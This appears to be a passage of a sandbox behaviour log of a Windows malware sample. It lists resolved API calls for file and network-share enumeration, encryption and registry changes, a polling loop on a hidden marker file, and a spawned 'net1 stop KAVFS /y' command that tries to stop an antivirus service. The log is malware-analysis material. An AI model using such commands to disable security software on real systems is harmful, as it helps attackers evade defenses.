0x7756c480 [0126.025] GetProcAddress (hModule=0x77550000, lpProcName="GetStartupInfoW") returned 0x77568070 [0126.025] GetProcAddress (hModule=0x77550000, lpProcName="FindNextFileW") returned 0x77561910 [0126.026] GetProcAddress (hModule=0x77550000, lpProcName="VirtualAlloc") returned 0x775667a0 [0126.026] GetProcAddress (hModule=0x7feff740000, lpProcName="GetUserNameA") returned 0x7feff74dc20 [0126.026] GetProcAddress (hModule=0x77550000, lpProcName="ExitProcess") returned 0x776940f0 [0126.026] GetProcAddress (hModule=0x77550000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x7759bb30 [0126.026] GetProcAddress (hModule=0x77550000, lpProcName="CreateProcessA") returned 0x775e8840 [0126.026] GetProcAddress (hModule=0x7fefaf60000, lpProcName="GetIpNetTable") returned 0x7fefaf6e558 [0126.026] GetProcAddress (hModule=0x77550000, lpProcName="GetVersionExW") returned 0x7755d910 [0126.026] GetProcAddress (hModule=0x77550000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x7759bb40 [0126.027] GetProcAddress (hModule=0x77550000, lpProcName="GetSystemDefaultLangID") returned 0x775594e0 [0126.027] GetProcAddress (hModule=0x7feff740000, lpProcName="GetUserNameW") returned 0x7feff751fd0 [0126.027] GetProcAddress (hModule=0x77550000, lpProcName="ReadFile") returned 0x77561500 [0126.027] GetProcAddress (hModule=0x7feff740000, lpProcName="RegQueryValueExA") returned 0x7feff75c480 [0126.027] GetProcAddress (hModule=0x77550000, lpProcName="CloseHandle") returned 0x77572f80 [0126.027] GetProcAddress (hModule=0x7feff740000, lpProcName="RegSetValueExW") returned 0x7feff751ed0 [0126.027] GetProcAddress (hModule=0x7feff740000, lpProcName="RegCloseKey") returned 0x7feff760710 [0126.028] GetProcAddress (hModule=0x77550000, lpProcName="CopyFileA") returned 0x775e5620 [0126.028] GetProcAddress (hModule=0x77550000, lpProcName="SetFileAttributesW") returned 0x775637a0 [0126.028] GetProcAddress (hModule=0x77550000, lpProcName="WinExec") returned 0x775e8d80 [0126.028] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDeriveKey") returned 0x7feff77b6b0 [0126.028] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptGenKey") returned 0x7feff7419bc [0126.028] GetProcAddress (hModule=0x77550000, lpProcName="Sleep") returned 0x77572b70 [0126.028] GetProcAddress (hModule=0x77550000, lpProcName="GetCurrentProcess") returned 0x77565cf0 [0126.028] GetProcAddress (hModule=0x7fefe360000, lpProcName="ShellExecuteW") returned 0x7fefe37983c [0126.029] GetProcAddress (hModule=0x77550000, lpProcName="GetFileSize") returned 0x7755f9d0 [0126.029] GetProcAddress (hModule=0x77550000, lpProcName="GlobalAlloc") returned 0x775580c0 [0126.029] GetProcAddress (hModule=0x77550000, lpProcName="FindClose") returned 0x7756bd60 [0126.029] GetProcAddress (hModule=0x77550000, lpProcName="WaitForMultipleObjects") returned 0x77561170 [0126.029] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleFileNameA") returned 0x775664a0 [0126.029] GetProcAddress (hModule=0x7fefe360000, lpProcName="ShellExecuteA") returned 0x7fefe5bec80 [0126.030] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleHandleA") returned 0x775665e0 [0126.030] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleFileNameW") returned 0x77567700 [0126.030] GetProcAddress (hModule=0x77550000, lpProcName="CreateFileA") returned 0x775731f0 [0126.030] GetProcAddress (hModule=0x77550000, lpProcName="GetFileSizeEx") returned 0x77559b30 [0126.030] GetProcAddress (hModule=0x77550000, lpProcName="WriteFile") returned 0x775735a0 [0126.030] GetProcAddress (hModule=0x77550000, lpProcName="GetLogicalDrives") returned 0x7755b930 [0126.030] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetEnumResourceW") returned 0x7fefaaa41a0 [0126.030] GetProcAddress (hModule=0x7feff740000, lpProcName="RegOpenKeyExW") returned 0x7feff7606f0 [0126.031] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetCloseEnum") returned 0x7fefaaa42dc [0126.031] GetProcAddress (hModule=0x77550000, lpProcName="GetWindowsDirectoryW") returned 0x775582b0 [0126.031] GetProcAddress (hModule=0x77550000, lpProcName="SetFileAttributesA") returned 0x77552d50 [0126.031] GetProcAddress (hModule=0x7feff740000, lpProcName="RegOpenKeyExA") returned 0x7feff75b5f0 [0126.031] GetProcAddress (hModule=0x77550000, lpProcName="SetFilePointer") returned 0x77561150 [0126.031] GetProcAddress (hModule=0x77550000, lpProcName="GetTickCount") returned 0x77572b00 [0126.031] GetProcAddress (hModule=0x77550000, lpProcName="GetFileAttributesW") returned 0x7756bdd0 [0126.031] GetProcAddress (hModule=0x77550000, lpProcName="FindFirstFileW") returned 0x7756bd80 [0126.032] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptAcquireContextW") returned 0x7feff74d98c [0126.032] GetProcAddress (hModule=0x77550000, lpProcName="MoveFileExW") returned 0x77553060 [0126.032] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetOpenEnumW") returned 0x7fefaaa3e00 [0126.032] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CoInitialize") returned 0x7fefde0a51c [0126.032] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDecrypt") returned 0x7feff77b6d0 [0126.032] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptImportKey") returned 0x7feff74af6c [0126.032] GetProcAddress (hModule=0x77550000, lpProcName="SetFilePointerEx") returned 0x7755af00 [0126.033] GetProcAddress (hModule=0x77550000, lpProcName="CopyFileW") returned 0x775592d0 [0126.033] GetProcAddress (hModule=0x77550000, lpProcName="FreeLibrary") returned 0x77566620 [0126.033] GetProcAddress (hModule=0x77550000, lpProcName="CreateProcessW") returned 0x77571bb0 [0126.033] GetProcAddress (hModule=0x77550000, lpProcName="CreateDirectoryW") returned 0x7755ad70 [0126.033] GetProcAddress (hModule=0x77550000, lpProcName="CreateThread") returned 0x77566580 [0126.033] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDestroyKey") returned 0x7feff74afa0 [0126.033] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CoCreateInstance") returned 0x7fefde17490 [0126.034] GetProcAddress (hModule=0x77550000, lpProcName="CreateFileW") returned 0x77561870 [0126.034] GetProcAddress (hModule=0x77550000, lpProcName="GetFileAttributesA") returned 0x775613e0 [0126.034] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptEncrypt") returned 0x7feff77b650 [0126.034] GetProcAddress (hModule=0x7feff740000, lpProcName="RegDeleteValueW") returned 0x7feff74bbb0 [0126.034] GetVersionExW (in: lpVersionInformation=0x34cf8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x34cf8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0126.034] GetWindowsDirectoryW (in: lpBuffer=0x34cf990, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0126.034] SetLastError (dwErrCode=0x0) [0126.034] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0126.034] GetLastError () returned 0x20 [0126.034] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0126.034] Sleep (dwMilliseconds=0x1388) [0131.039] Sleep (dwMilliseconds=0x2328) [0140.072] GetWindowsDirectoryW (in: lpBuffer=0x34cf990, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0140.072] SetLastError (dwErrCode=0x0) [0140.072] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.072] GetLastError () returned 0x20 [0140.072] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.072] Sleep (dwMilliseconds=0x2328) [0149.620] GetWindowsDirectoryW (in: lpBuffer=0x34cf990, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0149.620] SetLastError (dwErrCode=0x0) [0149.620] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0149.620] GetLastError () returned 0x20 [0149.620] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0149.620] Sleep (dwMilliseconds=0x2328) [0158.658] GetWindowsDirectoryW (in: lpBuffer=0x34cf990, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0158.658] SetLastError (dwErrCode=0x0) [0158.658] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0158.658] GetLastError () returned 0x20 [0158.658] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0158.658] Sleep (dwMilliseconds=0x2328) Thread: id = 1024 os_tid = 0x1278 Process: id = "418" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x739a6000" os_pid = "0x1160" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "409" os_parent_pid = "0xee0" cmd_line = "C:\\Windows\\system32\\net1 stop KAVFS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14665 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14666 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14667 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14668 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 14669 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14670 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14671 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14672 start_va = 0xffec0000 end_va = 0xffef2fff entry_point = 0xffec0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 14673 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14674 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14675 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 14676 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14677 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14678 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14679 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 14680 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14681 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14682 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14683 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14684 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14685 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 14686 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 14687 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14688 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14689 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14690 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14691 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14692 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14693 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14694 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14695 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14696 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14697 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14698 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14699 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14700 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14701 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14702 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14716 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 1012 os_tid = 0x10e8 [0125.723] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f790 | out: lpSystemTimeAsFileTime=0x18f790*(dwLowDateTime=0xffd6e530, dwHighDateTime=0x1d48689)) [0125.723] GetCurrentProcessId () returned 0x1160 [0125.723] GetCurrentThreadId () returned 0x10e8 [0125.723] GetTickCount () returned 0x28f43 [0125.723] QueryPerformanceCounter (in: lpPerformanceCount=0x18f798 | out: lpPerformanceCount=0x18f798*=1817264100000) returned 1 [0125.724] GetModuleHandleW (lpModuleName=0x0) returned 0xffec0000 [0125.724] __set_app_type (_Type=0x1) [0125.724] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffed9c9c) returned 0x0 [0125.724] __getmainargs (in: _Argc=0xffee4780, _Argv=0xffee4790, _Env=0xffee4788, _DoWildCard=0, _StartInfo=0xffee479c | out: _Argc=0xffee4780, _Argv=0xffee4790, _Env=0xffee4788) returned 0 [0125.724] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.724] GetConsoleOutputCP () returned 0x1b5 [0125.724] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffeecec0 | out: lpCPInfo=0xffeecec0) returned 1 [0125.724] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0125.726] sprintf_s (in: _DstBuf=0x18f738, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.726] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.888] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0125.888] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0125.888] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFS /y" [0125.888] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f4d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0125.888] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.888] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f728 | out: Buffer=0x18f728*=0x294d40) returned 0x0 [0125.888] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f728 | out: Buffer=0x18f728*=0x29c0e0) returned 0x0 [0125.888] _fileno (_File=0x7fefdba2a80) returned 0 [0125.888] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0125.889] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.889] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.889] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.889] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.889] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.889] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.889] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.889] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.889] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.889] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.889] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.889] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.889] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.889] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.889] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.889] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.889] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.889] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.889] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.889] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.889] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.889] _wcsicmp (_String1="accounts", _String2="KAVFS") returned -10 [0125.889] _wcsicmp (_String1="computer", _String2="KAVFS") returned -8 [0125.889] _wcsicmp (_String1="config", _String2="KAVFS") returned -8 [0125.889] _wcsicmp (_String1="continue", _String2="KAVFS") returned -8 [0125.889] _wcsicmp (_String1="cont", _String2="KAVFS") returned -8 [0125.889] _wcsicmp (_String1="file", _String2="KAVFS") returned -5 [0125.889] _wcsicmp (_String1="files", _String2="KAVFS") returned -5 [0125.889] _wcsicmp (_String1="group", _String2="KAVFS") returned -4 [0125.889] _wcsicmp (_String1="groups", _String2="KAVFS") returned -4 [0125.889] _wcsicmp (_String1="help", _String2="KAVFS") returned -3 [0125.890] _wcsicmp (_String1="helpmsg", _String2="KAVFS") returned -3 [0125.890] _wcsicmp (_String1="localgroup", _String2="KAVFS") returned 1 [0125.890] _wcsicmp (_String1="pause", _String2="KAVFS") returned 5 [0125.890] _wcsicmp (_String1="session", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="sessions", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="sess", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="share", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="start", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="stats", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="statistics", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="stop", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="time", _String2="KAVFS") returned 9 [0125.890] _wcsicmp (_String1="user", _String2="KAVFS") returned 10 [0125.890] _wcsicmp (_String1="users", _String2="KAVFS") returned 10 [0125.890] _wcsicmp (_String1="msg", _String2="KAVFS") returned 2 [0125.890] _wcsicmp (_String1="messenger", _String2="KAVFS") returned 2 [0125.890] _wcsicmp (_String1="receiver", _String2="KAVFS") returned 7 [0125.890] _wcsicmp (_String1="rcv", _String2="KAVFS") returned 7 [0125.890] _wcsicmp (_String1="netpopup", _String2="KAVFS") returned 3 [0125.890] _wcsicmp (_String1="redirector", _String2="KAVFS") returned 7 [0125.890] _wcsicmp (_String1="redir", _String2="KAVFS") returned 7 [0125.890] _wcsicmp (_String1="rdr", _String2="KAVFS") returned 7 [0125.890] _wcsicmp (_String1="workstation", _String2="KAVFS") returned 12 [0125.890] _wcsicmp (_String1="work", _String2="KAVFS") returned 12 [0125.890] _wcsicmp (_String1="wksta", _String2="KAVFS") returned 12 [0125.890] _wcsicmp (_String1="prdr", _String2="KAVFS") returned 5 [0125.890] _wcsicmp (_String1="devrdr", _String2="KAVFS") returned -7 [0125.890] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFS") returned 1 [0125.890] _wcsicmp (_String1="server", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="svr", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="srv", _String2="KAVFS") returned 8 [0125.890] _wcsicmp (_String1="lanmanserver", _String2="KAVFS") returned 1 [0125.890] _wcsicmp (_String1="alerter", _String2="KAVFS") returned -10 [0125.890] _wcsicmp (_String1="netlogon", _String2="KAVFS") returned 3 [0125.891] _wcsupr (in: _String="KAVFS" | out: _String="KAVFS") returned="KAVFS" [0125.891] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x29c900 [0125.895] GetServiceKeyNameW (in: hSCManager=0x29c900, lpDisplayName="KAVFS", lpServiceName=0xffee5750, lpcchBuffer=0x18f648 | out: lpServiceName="", lpcchBuffer=0x18f648) returned 0 [0125.896] _wcsicmp (_String1="msg", _String2="KAVFS") returned 2 [0125.896] _wcsicmp (_String1="messenger", _String2="KAVFS") returned 2 [0125.896] _wcsicmp (_String1="receiver", _String2="KAVFS") returned 7 [0125.896] _wcsicmp (_String1="rcv", _String2="KAVFS") returned 7 [0125.896] _wcsicmp (_String1="redirector", _String2="KAVFS") returned 7 [0125.896] _wcsicmp (_String1="redir", _String2="KAVFS") returned 7 [0125.896] _wcsicmp (_String1="rdr", _String2="KAVFS") returned 7 [0125.896] _wcsicmp (_String1="workstation", _String2="KAVFS") returned 12 [0125.897] _wcsicmp (_String1="work", _String2="KAVFS") returned 12 [0125.897] _wcsicmp (_String1="wksta", _String2="KAVFS") returned 12 [0125.897] _wcsicmp (_String1="prdr", _String2="KAVFS") returned 5 [0125.897] _wcsicmp (_String1="devrdr", _String2="KAVFS") returned -7 [0125.897] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFS") returned 1 [0125.897] _wcsicmp (_String1="server", _String2="KAVFS") returned 8 [0125.897] _wcsicmp (_String1="svr", _String2="KAVFS") returned 8 [0125.897] _wcsicmp (_String1="srv", _String2="KAVFS") returned 8 [0125.897] _wcsicmp (_String1="lanmanserver", _String2="KAVFS") returned 1 [0125.897] _wcsicmp (_String1="alerter", _String2="KAVFS") returned -10 [0125.897] _wcsicmp (_String1="netlogon", _String2="KAVFS") returned 3 [0125.897] NetServiceControl (in: servername=0x0, service="KAVFS", opcode=0x0, arg=0x0, bufptr=0x18f650 | out: bufptr=0x18f650) returned 0x889 [0125.898] wcscpy_s (in: _Destination=0xffee80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.898] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0125.899] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffee5b50, nSize=0x800, Arguments=0xffee7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.901] GetFileType (hFile=0xb) returned 0x2 [0125.901] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f518 | out: lpMode=0x18f518) returned 1 [0125.901] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffee5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f510, lpReserved=0x0 | out: lpBuffer=0xffee5b50*, lpNumberOfCharsWritten=0x18f510*=0x1e) returned 1 [0125.902] GetFileType (hFile=0xb) returned 0x2 [0125.902] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f518 | out: lpMode=0x18f518) returned 1 [0125.902] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffec1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f510, lpReserved=0x0 | out: lpBuffer=0xffec1efc*, lpNumberOfCharsWritten=0x18f510*=0x2) returned 1 [0125.902] _ultow (in: _Dest=0x889, _Radix=1635712 | out: _Dest=0x889) returned="2185" [0125.902] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffee5b50, nSize=0x800, Arguments=0xffee7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.903] GetFileType (hFile=0xb) returned 0x2 [0125.903] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f518 | out: lpMode=0x18f518) returned 1 [0125.903] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffee5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f510, lpReserved=0x0 | out: lpBuffer=0xffee5b50*, lpNumberOfCharsWritten=0x18f510*=0x34) returned 1 [0125.903] GetFileType (hFile=0xb) returned 0x2 [0125.904] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f518 | out: lpMode=0x18f518) returned 1 